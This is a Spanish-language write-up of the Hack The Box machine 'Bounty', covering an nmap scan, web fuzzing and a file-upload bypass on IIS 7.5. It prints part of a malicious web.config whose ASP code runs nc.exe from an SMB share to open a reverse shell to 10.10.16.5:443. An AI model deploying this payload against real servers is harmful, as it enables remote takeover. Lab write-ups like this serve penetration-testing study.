Hacemos el escaneo de nmap: {{pasted_image_20240123095849.png|}} Donde vemos que se trata de un IIS en su versión 7.5: {{pasted_image_20240123095912.png|}} Y esto corre por el puerto 80: {{pasted_image_20240123095812.png|}} Añadimos el dominio de bounty.htb al /etc/hosts: {{pasted_image_20240123102057.png|}} Hacemos fuzzing web en busca de directorios y extensiones, donde vemos transfer.aspx: {{pasted_image_20240123100216.png|}} Y si quitamos lo de las extensiones de archivos, vemos un /uploadedfiles: {{pasted_image_20240123102345.png|}} Por tanto, la primera ruta vemos que se trata de un panel de subida de archivos: {{pasted_image_20240123100147.png|}} Y en la de uploadedfiles no tenemos acceso: {{pasted_image_20240123102415.png|}} Si investigamos por internet, vemos que podemos subir archivos con extensión .config: {{pasted_image_20240123100805.png|}} Por tanto, debemos de crear un archivo con extensión .config que tenga formato xml y pueda ejecutar comandos, el cual será el siguiente: ") Response.write("
")
Set wShell1 = CreateObject("WScript.Shell")
Set cmd1 = wShell1.Exec("\\10.10.16.5\smbFolder\nc.exe -e cmd 10.10.16.5 443")
output1 = cmd1.StdOut.Readall()
set cmd1 = nothing: Set wShell1 = nothing
Response.write(output1)
Response.write("
*–>
Se subió correctamente: {{pasted_image_20240123101738.png|}}